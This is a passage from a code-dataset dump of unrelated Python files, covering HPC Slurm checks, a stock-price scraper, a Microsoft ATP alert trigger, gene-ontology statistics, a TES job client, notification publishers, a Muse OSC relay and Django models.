self.stdout)\n self.maintainers = ['VK']\n\n\nclass MonthlyUsageCheck(RunOnlyRegressionTest):\n def __init__(self, **kwargs):\n super().__init__('slurm_cscs_usertools_monthly_usage',\n os.path.dirname(__file__), **kwargs)\n self.valid_systems = ['daint:login', 'dom:login']\n self.descr = 'Slurm CSCS usertools monthly_usage'\n self.executable = 'monthly_usage'\n self.valid_prog_environs = ['PrgEnv-cray']\n self.num_tasks = 1\n self.num_tasks_per_node = 1\n self.tags = {'cscs_usertools', 'production',\n 'maintenance', 'single-node', 'ops'}\n self.sanity_patterns = sn.assert_found(\n r'Usage in Node hours for the Crays', self.stdout)\n self.maintainers = ['VK']\n\n\ndef _get_checks(**kwargs):\n return [SbucheckCommandCheck(**kwargs), MonthlyUsageCheck(**kwargs)]\n","sub_path":"cscs-checks/system/slurm/cscs_usertools.py","file_name":"cscs_usertools.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"636688396","text":"from Variables import * \nimport xlrd\nimport xlwt\nimport csv\nfrom urllib import request\nfrom bs4 import BeautifulSoup\n\n\n\"\"\"-----------------------------------------------------------------------------------\n\nCreates historical data array with entry for split only adjusted price. \n\n-----------------------------------------------------------------------------------\"\"\"\ndef addHistoricalSplit(data):\n tempData = data\n data = []\n \n for i in tempData:\n data.append(i[0:7])\n \n \"\"\"data is in format: \n 0-date, 1-open, 2-high, 3-low, 4-close, 5-adj-close, 6-volume. \n \"\"\"\n data[0].append(data[0][4])\n divisor = 1\n for i in range(1, len(data)):\n currentDayClose = float(data[i-1][4])\n previousDayClose = float(data[i][4])\n pctClose = (currentDayClose-previousDayClose)/currentDayClose\n onePercent = 0.025\n \n currentDayAdj = float(data[i-1][5])\n previousDayAdj = float(data[i][5])\n pctAdj = (currentDayAdj - previousDayAdj)/currentDayAdj\n \n \"\"\"If there is a difference between pctClose and pctAdj, usually means\n a dividend or split occured. A dividend is not as big as a split so if\n the difference is 2.5%, the difference is classified as a dividend. \n Anything larger is classified as a split. \"\"\"\n if((pctClose - onePercent) <= pctAdj and pctAdj <= (pctClose + onePercent)):\n pass\n else:\n withoutSplit = currentDayClose * (1 - pctAdj)\n split = previousDayClose / withoutSplit\n divisor *= split\n \n if(divisor != 1): \n data[i].append(float(data[i][4])/divisor)\n else:\n data[i].append(float(data[i][4]))\n \n# for i in data:\n# print(i)\n return data\n\n\"\"\"-----------------------------------------------------------------------------------\n\nReturns historical stock data in array with [date, closing price] \n\n-----------------------------------------------------------------------------------\"\"\"\ndef getHistoricalPrices(tickerName):\n fileVariables = Variables()\n directory = fileVariables.directory\n fileEnding = fileVariables.returnFileEnding(tickerName)\n\n try:\n csv_file = open(directory + tickerName+'-Y.csv', \"r\")\n reader = csv.reader(csv_file, delimiter = ' ')\n yahoo_data_array = []\n except:\n try:\n csv_file = open(directory + tickerName+'.csv', \"r\")\n reader = csv.reader(csv_file, delimiter = ' ')\n yahoo_data_array = []\n except:\n print('Error : File Not Opening')\n\n switched = False\n for lines in reader:\n if('Date' in lines or 'Date' in lines[0].split(',')):\n split = lines[0].split(',')\n if(split[5] == 'Volume'):\n switched = True\n pass\n else:\n yahoo_data_array.insert(0,lines[0].split(','))\n# print(switched)\n \n \"\"\"If volume and adj close is switched, switch it around [5] and [6]\"\"\" \n if(switched == True):\n index = 0 \n for i in yahoo_data_array:\n temp = []\n if(i[5] == 'null'):\n del yahoo_data_array[index]\n continue\n for j in range(0,5):\n temp.append(i[j])\n temp.append(i[6])\n temp.append(i[5])\n del yahoo_data_array[index]\n yahoo_data_array.insert(index, temp)\n index += 1\n \n \n for i in yahoo_data_array:\n dates = i[0].split('-')\n i[0] = dates[0] + '/' + dates[1] + '/' + dates[2]\n\n firstDate = float(yahoo_data_array[0][0].split('/')[0])\n if(firstDate < 2016):\n yahoo_data_array.reverse()\n \n i = 0\n while(i < len(yahoo_data_array)):\n if('null' in yahoo_data_array[i]):\n del yahoo_data_array[i]\n i -= 1\n i += 1\n \n yahoo_data_array = addHistoricalSplit(yahoo_data_array)\n \n return yahoo_data_array\n\n\n\n\"\"\"-----------------------------------------------------------------------------------\n\nAs of 18 May 2017 getting historical stock prices off of Yahoo Finance does not work. \nWhat I need to do is make my own database by first downloading excel data from Yahoo \nFinance by hand. This historical closing stock data is then updated by scraping either\nYahoo finance website or Google finance. \n\nThe first method is take historical data downloaded by hand and put them\nin stock.db\n\nThis method is for scraping and then updating data for stock. \n\n-----------------------------------------------------------------------------------\"\"\"\ndef updateHistoricalPrice(tickerName, sqlData): \n yahooFinance = \"https://finance.yahoo.com/quote/\" + tickerName + \"/history?p=\" + tickerName\n \n tempWebFile = request.urlopen(yahooFinance).read()\n tempData = BeautifulSoup(tempWebFile, \"lxml\")\n \n lines = tempData.find_all('div')\n priceInfo = ''\n \n for i in lines:\n if str(i).find('data-test=\"historical-prices\"') > 0:\n priceInfo = str(i)\n \n# print(priceInfo)\n\n month1 = [[\"Jan\", 1], [\"Feb\", 2], [\"Mar\", 3], [\"Apr\", 4], [\"May\", 5], [\"Jun\", 6], [\"Jul\", 7],\n [\"Aug\", 8], [\"Sep\", 9], [\"Oct\", 10], [\"Nov\", 11], [\"Dec\", 12]]\n\n index = priceInfo.find('>')\n priceHistory = []\n priceDay = []\n foundMonth = False\n added = 0\n while(index > 0):\n# print(priceInfo)\n temp = ''\n while(index < len(priceInfo) and priceInfo[index] != '<'):\n temp += priceInfo[index]\n index += 1\n \n temp = temp[1:]\n\n \"\"\"If temp includes a month, add next 7 \"\"\"\n if(foundMonth == False):\n for i in month1:\n if (temp.find(i[0]) >= 0):\n month = str(i[1])\n if(float(month) < 10):\n month = '0' + month\n day = ''\n \n commaFind = 4\n while(temp[commaFind] != ','):\n day += temp[commaFind]\n commaFind += 1\n day = day.strip()\n \n year = temp.split(',')[1].strip()\n date = year + '/' + month + '/' + day \n priceDay.append(date)\n\n priceInfo = priceInfo[index:]\n added = 0 \n foundMonth = True \n break\n \n elif(foundMonth == True and added < 6):\n if(len(temp) > 0):\n keyword = temp.replace(',','')\n \"\"\"Skip if the row has \"Dividend\" in it \"\"\"\n if(keyword == 'Dividend'):\n foundMonth = False\n added = 0\n priceDay = []\n else:\n priceDay.append(keyword)\n added += 1\n \n if(foundMonth == True and added >= 6):\n added = 0\n foundMonth = False\n priceHistory.append(priceDay)\n priceDay = []\n \n priceInfo = priceInfo[index:]\n index = priceInfo.find('>')\n \n latestSQLDate = sqlData[0][0]\n\n \n index = 0\n for i in priceHistory:\n# print(i)\n if(latestSQLDate == i[0]):\n break\n index += 1\n \n# print(index)\n \n for i in range(0,index):\n sqlData.insert(i,priceHistory[i])\n \n for i in sqlData:\n if(len(i) < 8):\n i.append(i[4])\n \n \"\"\"If the price history has \"Stock Split\" in it, remove from array. \"\"\"\n for i in sqlData:\n if('Stock Split' in i):\n sqlData.remove(i)\n if(i[1] == '-' or i[2] == '-'):\n sqlData.remove(i)\n \n sqlData = addHistoricalSplit(sqlData) \n \n return sqlData\n \n","sub_path":"HistoricalPricesData/Download.py","file_name":"Download.py","file_ext":"py","file_size_in_byte":7882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"266249651","text":"import komand\nimport time\nfrom .schema import GetAlertForActorInput, GetAlertForActorOutput\n# Custom imports below\n\n\nclass GetAlertForActor(komand.Trigger):\n\n def __init__(self):\n super(self.__class__, self).__init__(\n name='get_alert_for_actor',\n description='Get alerts by an actor',\n input=GetAlertForActorInput(),\n output=GetAlertForActorOutput())\n self.ACTOR = \"Actor\"\n\n def run(self, params={}):\n \"\"\"Run the trigger\"\"\"\n while True:\n actor = params['actor']\n\n matching_alerts = self.connection.get_alerts_by_key_value(self.ACTOR, actor)\n if(len(matching_alerts) > 0):\n self.send({\"results\": matching_alerts})\n\n time.sleep(params.get(\"interval\", 5))\n\n def test(self):\n # This will raise an exception for failure cases\n self.connection.test()\n\n # No exception raised, pass back json\n return {\"results\": self.connection.fake_alert()}\n","sub_path":"microsoft_atp/komand_microsoft_atp/triggers/get_alert_for_actor/trigger.py","file_name":"trigger.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"5063760","text":"from scipy.stats import hypergeom, rankdata, chisqprob, fisher_exact\nimport logging\n\nfrom joblib import Memory\n\nMEMORY = Memory(cachedir=\"./\")\n\n\n@MEMORY.cache(verbose=0)\ndef compute_statistics(df, gene_vectors):\n\n \"\"\"Compute statistics for the gene lists overlap counts.\"\"\"\n\n logging.info(\"Performing hypergeometric tests.\")\n df = compute_go_overrepresentation_analysis(df)\n df = compute_odds_ratio(df)\n\n stat_method = find_appropriate_statistical_test(gene_vectors)\n\n if stat_method == \"LAP\":\n\n logging.info(\"Computing the Leisering, Alonzo and Pepe test.\")\n df = lap_ppv(df)\n fdr_cols = [\"a_hpgm_go\", \"b_hpgm_go\", \"chi_sq\"]\n\n elif stat_method == \"FE\":\n\n logging.info(\"Computing the Fisher Exact test.\")\n df = fishers_exact(df)\n fdr_cols = [\"a_hpgm_go\", \"b_hpgm_go\", \"fisher\"]\n\n\n elif stat_method == \"FE_SUB\":\n logging.info(\"Computing the Fisher Exact for subsets.\")\n df = fishers_exact_sub(df)\n fdr_cols = [\"a_hpgm_go\", \"b_hpgm_go\", \"fisher\"]\n\n elif stat_method == \"NA\":\n\n fdr_cols = [\"a_hpgm_go\"]\n\n logging.info(\"Computing FDR.\")\n df = compute_fdr(df, fdr_cols)\n\n return df\n\n\ndef compute_odds_ratio(df):\n\n df[\"a_odds\"] = (df[\"a_I_go\"] / df[\"a\"]) / \\\n ((df[\"U\"] - (df[\"a\"] + df[\"go_subtree\"] - df[\"a_I_go\"])) / (df[\"U\"] - df[\"a\"]))\n\n\n if \"b\" in df:\n df[\"b_odds\"] = (df[\"b_I_go\"] / df[\"b\"]) / \\\n ((df[\"U\"] - (df[\"b\"] + df[\"go_subtree\"] - df[\"b_I_go\"])) / (df[\"U\"] - df[\"b\"]))\n return df\n\n\ndef fishers_exact(df):\n\n \"\"\"Compute Fisher Exact for diff in a and b go overlap.\"\"\"\n\n df[\"fisher\"] = df.apply(lambda row:\n fisher_exact([\n [row[\"a_I_go\"], row[\"a\"] - row[\"a_I_go\"]],\n [row[\"b_I_go\"], row[\"b\"] - row[\"b_I_go\"]]\n ], alternative=\"two-sided\")[1],\n axis=1)\n\n return df\n\n\ndef fishers_exact_sub(df):\n\n \"\"\"Fisher Exact for diff in a and b go overlap when b subset of a.\n\n Requires |A| > |B|, which is ensured when parsing the input lists.\"\"\"\n\n assert df.iloc[0].a > df.iloc[0].b, \"Gene set a not bigger than b; this is due to a\" \\\n \" bug - please report it.\"\n\n df[\"fisher\"] = df.apply(lambda row:\n fisher_exact([\n [row.b_I_go, row.b - row.b_I_go],\n [row.a_I_go - row.b_I_go,\n row.a - row.b - row.a_I_go + row.b_I_go]\n ], alternative=\"two-sided\")[1],\n axis=1)\n\n return df\n\n\n@MEMORY.cache(verbose=0)\ndef compute_go_overrepresentation_analysis(df):\n\n \"\"\"Compute p-val for gene list representation in GO category.\n\n Uses hypergeometric test, supposed to be similar to GOstats.\n \"\"\"\n\n df[\"a_hpgm_go\"] = df.apply(lambda row: hypergeom.sf(row[\"a_I_go\"] - 1,\n row[\"U\"],\n row[\"go_subtree\"],\n row[\"a\"]), axis=1)\n\n if \"b\" in df:\n df[\"b_hpgm_go\"] = df.apply(lambda row: hypergeom.sf(row[\"b_I_go\"] - 1,\n row[\"U\"],\n row[\"go_subtree\"],\n row[\"b\"]), axis=1)\n\n return df\n\n\ndef compute_fdr(df, columns):\n \"\"\"Computes the false discovery rate for a list of columns.\"\"\"\n\n for column in columns:\n cp = df[column]\n fdr_col = column + \"_fdr\"\n\n # Using the length of the vector without NAs because NAs indicate\n # that an experiment wasn't performed so you do not have to adjust\n # for it.\n df[fdr_col] = cp * len(cp.dropna()) / rankdata(cp)\n\n df.loc[df[fdr_col] > 1, fdr_col] = 1\n\n return df\n\n\ndef lap_ppv(df):\n\n \"\"\"Computes the Generalized Score Statistic for Comparison of PPVs\n\n (The generalized score statistic was proposed by Leisenring, Alonzo and Pepe\n (2000), hence the name lap_ppv.)\n\n This is a test used to compare the positive predictive value (PPV) of\n two gene lists with regards to the gene list associated with an ontology.\n\n That is, for three gene lists A and B and O (the genes associated\n with an ontology term), it computes the PPV for A and B with regards to O,\n then compares the two PPVs to see whether they are significantly different.\n\n For a gene list A and an ontology gene list O, the PPV is just\n\n PPV = TP/(TP + FP)\n\n where\n\n TP = A set subtract O\n\n while\n\n FP = A set intersect O.\n\n This method should be used when lists A and B are not disjoint and one list\n is not a proper subset of the other.\n\n Alternative description:\n\n 'Performs a test for differences in (positive and negative) predictive\n values of two binary diagnostic tests using a generalized score statistic\n proposed by Leisenring, Alonzo and Pepe'\n ( From https://cran.r-project.org/web/packages/DTComPair/DTComPair.pdf )\n\n Literature:\n\n Leisenring, W., Alonzo, T., and Pepe, M. S. (2000). Comparisons of\n predictive values of binary medical diagnostic tests for paired designs.\n Biometrics, 56(2):345-51.\n\n Clara-Cecilie Gunther, Mette Langaas and Stian Lydersen, 2006: Statistical\n Hypothesis Testing of Association Between Two Lists of Genes for a Given\n Gene Class\n\n Beisvaag et al 2006: GeneTools - application for functional annotation\n and statistical hypothesis testing.\n (The Leisering test is described there as \"the intersecting target-target\n situation\" and used in the exactly same way as here.)\n\n ------------------------------------------------------------------------\n This is the R code this function is based on (thanks Mette Langaas!)\n\n LAPtestPPV <- function(datamat)\n {\n #faar inn data paa formen n1,n2,n3,...,n8\n x1 <- datamat[,5]\n n1 <- datamat[,1]+datamat[,5]\n x2 <- datamat[,6]\n n2 <- datamat[,2]+datamat[,6]\n x3 <- datamat[,7]\n n3 <- datamat[,3]+datamat[,7]\n\n nA <- n1+n2\n nB <- n1+n3\n\n xAG <- x1+x2\n xBG <- x1+x3\n\n Dstrek <- (xAG+xBG)/(nA+nB)\n Zstrek <- nB/(nA+nB)\n\n teller2 <- (xBG-nB*(xAG+xBG)/(nA+nB))^2\n # 6 sums: first 3 with G*: AsnittB, AsnittB*, A*snittB, then with G\n nevner2 <-\n((0-Dstrek)^2)*((n1-x1)*(1-2*Zstrek)^2+(n2-x2)*(0-1*Zstrek)^2+(n3-x3)*(1-1*Zstrek)^2)+((1-Dstrek)^2)*(x1*(1-2*Zstrek)^2+x2*(0-1*Zstrek)^2+x3*(1-1*Zstrek)^2)\n\n\n testobs <- teller2/nevner2\n pvalchisq <- pchisq(testobs,1,lower.tail=F)\n return(list(pval=pvalchisq,testobs=testobs))\n\n }\n\n \"\"\"\n\n x1 = df[\"a_I_b\"]\n n1 = x1 + df[\"a_I_b_I_go\"]\n x2 = df[\"a_M_b_I_go\"]\n n2 = x2 + df[\"a_I_b_I_go\"]\n x3 = df[\"b_M_a_I_go\"]\n n3 = df[\"a_I_b_I_go\"] + x3\n\n nA = n1 + n2\n nB = n1 + n3\n\n xAG = x1 + x2\n xBG = x1 + x3\n\n d_prime = (xAG + xBG) / (nA + nB)\n z_prime = nB / (nA + nB)\n\n numerator = (xBG - nB * (xAG + xBG) / (nA + nB))**2\n\n denominator = ((0 - d_prime)**2) * \\\n ((n1 - x1) * (1 - 2 * z_prime)**2 + (n2 - x2)* \\\n (0 - 1 * z_prime)**2+(n3 - x3)*(1 - 1 * z_prime)**2)+ \\\n ((1 - d_prime)**2) * \\\n (x1 * (1 - 2 * z_prime)**2 + x2 * (0 - 1 * z_prime)**2 + \\\n x3 * (1 - 1 * z_prime)**2)\n\n test_observation = numerator / denominator\n\n df[\"chi_sq\"] = chisqprob(test_observation, 1)\n df[\"test_obs\"] = test_observation\n\n return df\n\n\ndef find_appropriate_statistical_test(gene_vectors):\n\n \"\"\"Find the appropriate statistical test.\n\n The statistical test to use to decide whether there is a statistically\n significant difference between the overrepresentation of 1) gene list a in GO\n and 2) gene list b in GO.\n\n If there is only one input gene list, or the lists contain the same genes,\n do not perform a significance test of the difference.\n\n If one input gene list is a subset of the other, or they are disjoint,\n use Fisher's Exact.\n\n If the lists are intersecting, but they are not proper subsets/supersets of\n each other, use the LAP test.\n \"\"\"\n\n if len(gene_vectors) == 1:\n return \"NA\"\n\n genes_a, genes_b = gene_vectors\n genes_a, genes_b = set(genes_a), set(genes_b)\n\n if genes_a == genes_b:\n logging.warning(\"Gene list A is equal to B. Only hypergeometric tests\"\n \" are performed.\")\n return \"NA\"\n elif genes_b.issubset(genes_a): # a subset of b is impossible, |a| > |b|\n return \"FE_SUB\"\n elif not genes_a.intersection(genes_b):\n return \"FE\"\n else:\n # The gene lists are intersecting, but not proper\n # subsets so Fishers Exact can't be used.\n return \"LAP\"\n","sub_path":"go_overlap/statistics/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":8888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"138510844","text":"# !/usr/local/python\n# coding: utf-8\n\nimport pygame.font\n\nclass Button():\n\n def __init__(self, setting, screen, message):\n\n self.screen = screen\n self.screen_rect = screen.get_rect()\n\n self.width = 150\n self.height = 50\n self.button_color = (0, 255, 0)\n self.text_color = (255, 255, 255)\n self.font = pygame.font.SysFont(None, 40)\n\n self.rect = pygame.Rect(0, 0, self.width, self.height)\n self.rect.center = self.screen_rect.center\n\n self.pre_message(message)\n\n def pre_message(self, message):\n\n self.message_image = self.font.render(message, True, self.text_color, self.button_color)\n self.message_image_rect = self.message_image.get_rect()\n self.message_image_rect.center = self.rect.center\n\n def draw_button(self):\n\n self.screen.fill(self.button_color, self.rect)\n self.screen.blit(self.message_image, self.message_image_rect)","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"306867014","text":"# combo.py\n# created by Kaiwen Xu\n#\n# module related with combinatorics\nimport operator\n\n\ndef isPermutations(lst):\n\t\"\"\"Check whether numbers in the given list are permutations.\n\n\tArguments:\n\tlst -- list of numbers\n\t\"\"\"\n\tlength = 0\n\telements = {}\n\tfor i in xrange(0, len(lst)):\n\t\tnum = str(lst[i])\n\t\tif i == 0:\n\t\t\tlength = len(num)\n\t\t\tfor digit in num:\n\t\t\t\tif digit not in elements:\n\t\t\t\t\telements[digit] = 1\n\t\t\t\telse:\n\t\t\t\t\telements[digit] += 1\n\t\telse:\n\t\t\tif len(num) != length:\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\te = {}\n\t\t\t\tfor digit in num:\n\t\t\t\t\tif digit not in e:\n\t\t\t\t\t\te[digit] = 1\n\t\t\t\t\telse:\n\t\t\t\t\t\te[digit] += 1\n\t\t\t\telse:\n\t\t\t\t\tif e != elements:\n\t\t\t\t\t\treturn False\n\telse:\n\t\treturn True\n\n\ndef nCk(n, k):\n\t\"\"\"n choose k.\n\t\"\"\"\n\treturn int(round(reduce(operator.mul, (float(n - i) / (i + 1) for i in xrange(k)), 1)))\n","sub_path":"combo.py","file_name":"combo.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"356112422","text":"#!/usr/bin/env python\nimport argparse\nimport re\nimport json\nimport urllib2\nfrom urlparse import urlparse\nfrom minio import Minio\nimport requests\nimport polling\nimport logging\n\n\nlogging.getLogger(\"requests\").setLevel(logging.WARNING)\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--repeat\", type=int, default=1)\nparser.add_argument(\"--server\", default=\"http://localhost:8000\")\nparser.add_argument(\"--wait\", action=\"store_true\")\nparser.add_argument(\"task\")\n\n\nclass TES:\n\n def __init__(self,\n url,\n s3_endpoint=None,\n s3_access_key=None,\n s3_secret_key=None):\n self.url = url\n self.s3_endpoint = s3_endpoint\n self.s3_access_key = s3_access_key\n self.s3_secret_key = s3_secret_key\n\n def get_service_info(self):\n req = urllib2.Request(\"%s/v1/jobs-service\" % (self.url))\n u = urllib2.urlopen(req)\n return json.loads(u.read())\n\n def s3connect(self):\n n = urlparse(self.s3_endpoint)\n tls = None\n if n.scheme == \"http\":\n tls = False\n if n.scheme == \"https\":\n tls = True\n minioClient = Minio(\n n.netloc,\n access_key=self.s3_access_key,\n secret_key=self.s3_secret_key,\n secure=tls\n )\n return minioClient\n\n def upload_file(self, path, storage):\n n = urlparse(storage)\n if n.scheme != \"s3\":\n raise Exception(\"Not S3 URL\")\n c = self.s3connect()\n object_name = n.path\n object_name = re.sub(\"^/\", \"\", object_name)\n c.fput_object(n.netloc, object_name, path)\n\n def download_file(self, path, storage):\n n = urlparse(storage)\n if n.scheme != \"s3\":\n raise Exception(\"Not S3 URL\")\n c = self.s3connect()\n object_name = n.path\n object_name = re.sub(\"^/\", \"\", object_name)\n c.fget_object(n.netloc, object_name, path)\n\n def list(self, bucket):\n c = self.s3connect()\n for i in c.list_objects(bucket):\n yield \"s3://%s/%s\" % (bucket, i.object_name)\n\n def make_bucket(self, bucket):\n c = self.s3connect()\n c.make_bucket(bucket)\n\n def bucket_exists(self, bucket):\n c = self.s3connect()\n c.bucket_exists(bucket)\n\n def submit(self, task):\n req = urllib2.Request(\"%s/v1/jobs\" % (self.url))\n u = urllib2.urlopen(req, json.dumps(task))\n data = json.loads(u.read())\n job_id = data['value']\n return job_id\n\n def wait(self, job_id, timeout=10):\n def check_success(data):\n return data[\"state\"] not in ['Queued', \"Running\", \"Initializing\"]\n return polling.poll(\n lambda: self.get_job(job_id),\n check_success=check_success,\n timeout=timeout,\n step=0.1)\n\n def get_job(self, job_id):\n return requests.get(\"%s/v1/jobs/%s\" % (self.url, job_id)).json()\n\n def delete_job(self, job_id):\n return requests.delete(\"%s/v1/jobs/%s\" % (self.url, job_id)).json()\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n c = TES(args.server)\n t = json.load(open(args.task))\n\n job_ids = []\n for i in range(args.repeat):\n job_id = c.submit(t)\n job_ids.append(job_id)\n\n if args.wait:\n for job_id in job_ids:\n c.wait(job_id)\n","sub_path":"python/py_tes.py","file_name":"py_tes.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"556217738","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.14-x86_64/egg/filebeat_delegate/publisher.py\n# Compiled at: 2019-06-16 05:47:41\n__author__ = 'Alexander.Li'\nimport json, boto3, logging, requests\nfrom utilities import SingletonMixin\nfrom errorbuster import formatError\n\nclass MailgunPublisher(SingletonMixin):\n\n def __init__(self):\n self.url = None\n self.key = None\n self.configure = None\n return\n\n def init_publisher(self, configure):\n self.url = ('https://api.mailgun.net/v3/{0.mg_domain}/messages').format(configure)\n self.key = configure.mg_key\n self.configure = configure\n\n def sendMessage(self, message):\n r = requests.post(self.url, auth=('api', self.key), data={'from': (' ').format(self.configure), 'to': [\n self.configure.mg_target, 'YOU@YOUR_DOMAIN_NAME'], \n 'subject': 'error report', \n 'text': message})\n logging.info(r.text)\n\n\nclass SNSPublisher(SingletonMixin):\n\n def __init__(self):\n self.sns = None\n self.topic = None\n return\n\n def init_publisher(self, configure):\n self.sns = boto3.resource('sns', region_name=configure.aws_region, aws_access_key_id=configure.aws_key, aws_secret_access_key=configure.aws_secret)\n self.topic = self.sns.Topic(configure.aws_topic)\n\n def sendMessage(self, message):\n payloads = json.dumps({'default': message})\n try:\n response = self.topic.publish(Message=payloads, MessageStructure='json')\n logging.info('%s published with response %s', message, response)\n except Exception as e:\n logging.error(formatError(e))","sub_path":"pycfiles/filebeat_delegate-0.2.0.dev0-py2.7/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"418237357","text":"# -*- coding:UTF-8 -*-\n'''\nCreated on 2016-4-12\n\n@author: N-286\n'''\nfrom CONFIG.InitDefaultPara import orgInit\n\nTongJiLieBiao={\n 'informationStatistics.yearMonth':'',\n 'informationStatistics.parentId':orgInit['DftQuOrgId'],\n '_search':'false',\n 'rows':'-1',\n 'page':'1',\n 'sidx':'id',\n 'sord':'desc'\n }\n#事件结案后评分参数\nPingFen={\n 'tqmobile':'true',\n 'publishUserId':'',\n 'id':'',\n 'score':''\n }","sub_path":"testAPI/Web_Test/Interface/YunWeiPingTai/TongJiFenXi/TongJiFenXiPara.py","file_name":"TongJiFenXiPara.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"169060591","text":"# Autor: Luis Mario Cervantes Ortiz , A01376958\n# Descripcion: Saber el numero total de alumnos en una escuela y saber los porcentajes de hombres y mujeres inscritas\n\n# Escribe tu programa después de esta línea.\nmuj=input(\"Numero de mujeres: \")\nhom=input(\"Numero de hombres: \")\nmuj=int(muj)\nhom=int(hom)\ntotal= (muj+hom)\nprint(\"Total de alumnos: \",total)\ntotal=int(total)\n\nPorcentajemuj=(((muj*100))/total)\nprint(\"Porcentaje de Mujeres: %.1f\" %Porcentajemuj)\nPorcentajehom=((hom*100)/total)\nprint(\"Porcentaje de Hombres: %.1f\" % Porcentajehom)","sub_path":"porcentajes.py","file_name":"porcentajes.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"335708115","text":"import textwrap\n\nfrom xmodule.tests.test_capa_module import CapaFactory\nfrom xmodule.modulestore.tests.factories import ItemFactory\nfrom course_dashboard.tests.base import BaseCourseDashboardTestCase\nfrom course_dashboard.answers_distribution_reports_manager import tasks\nfrom course_dashboard.answers_distribution import get_problem_module\n\nclass TestGradesReportManagerTasks(BaseCourseDashboardTestCase):\n\n def test_get_problem_module_size(self):\n \n xml = textwrap.dedent(\"\"\"\n \n \n \n Apple\n Banana\n Chocolate\n Donut\n \n \n

    HELLO

    \n \n \n Apple\n Banana\n Chocolate\n Donut\n \n \n
    \n \"\"\")\n \n problem_module = CapaFactory.create(xml=xml)\n self.assertEqual(2, tasks.get_problem_module_size(problem_module)) \n\n \n def test_create_header_row(self):\n self.assertEqual(['id', 'gender', 'year_of_birth', 'level_of_education','q1', 'q2', 'q3'],\n tasks.create_header_row(3))\n\n def test_create_list_of_question_id(self):\n problem_module_id = \"22220f82d19a42239ae45d73002633c6\"\n course_number = '1035'\n organisation = 'cnam'\n quizz_size = 2\n list_of_question_ids = [\"i4x-cnam-1035-problem-22220f82d19a42239ae45d73002633c6_2_1\",\n \"i4x-cnam-1035-problem-22220f82d19a42239ae45d73002633c6_3_1\"]\n \n self.assertEqual(tasks.create_list_of_question_ids(organisation,\n course_number,\n problem_module_id,\n quizz_size),\n list_of_question_ids)\n\n \n \n","sub_path":"course_dashboard/answers_distribution_reports_manager/tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"365169462","text":"import argparse\nfrom OSC import OSCServer\nfrom socketIO_client import SocketIO, LoggingNamespace\n\nsocket = SocketIO('http://ehd2016.azurewebsites.net/', 80, LoggingNamespace)\nf = open('secret.txt', 'r')\nsecret = f.readline().rstrip('\\n')\nf.close()\n\ndef send(path, tags, args, source):\n print(path, args)\n toSend = {\n 'room': 'muse0',\n 'id': path,\n 'data': args,\n 'secret': secret,\n 'rapid': True\n }\n socket.emit('data', toSend)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", default=\"localhost\", help=\"The ip to listen on\")\n parser.add_argument(\"--port\", type=int, default=5001, help=\"The port to listen on\")\n args = parser.parse_args()\n\n server = OSCServer((args.ip, args.port))\n server.addMsgHandler(\"default\", send)\n server.serve_forever()\n","sub_path":"museosc/museosc.py","file_name":"museosc.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"563975268","text":"import json\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.db import models, utils\nfrom django.db.models.signals import pre_delete\nfrom django.dispatch.dispatcher import receiver\nfrom django.forms import ValidationError\n\nfrom general_model import file_delete_default, metro_icon_default, filename_default, clean_text\nfrom general_model import print_list, get_ext\nfrom timeline.models import TimeSlot\nfrom timeline.utils import get_timeslot, get_timeslot_id\n\ntry:\n from django.contrib.auth.models import Group\n # mailing list options\n # do not remove items, as they might be stored in mailtemplates.\n mail_student_options = (\n ('all', 'All students'),\n ('10ectsstd', 'Students on marketplace with 10ECTS'),\n ('15ectsstd', 'Students on marketplace with 15ECTS'),\n ('distributedstd', 'Students with assigned project'),\n )\n mail_staff_options = tuple(Group.objects.all().values_list('name', 'name'))\n mail_staff_options += (\n ('staffnonfinishedproj', 'Staff with non-finished project'),\n ('distributedstaff', 'Staff with students'),\n ('staffnostudents', 'Staff with no students'),\n ('assessors', 'Presentation assessors and track heads'),\n )\nexcept utils.OperationalError:\n # happens during migrations\n mail_staff_options = ((), ())\n mail_student_options = ((), ())\n\n\nclass CapacityGroup(models.Model):\n ShortName = models.CharField(max_length=3)\n FullName = models.CharField(max_length=256)\n Administrators = models.ManyToManyField(User, related_name='administratorgroups',\n through='GroupAdministratorThrough')\n Head = models.ForeignKey(User, blank=True, null=True, on_delete=models.CASCADE, 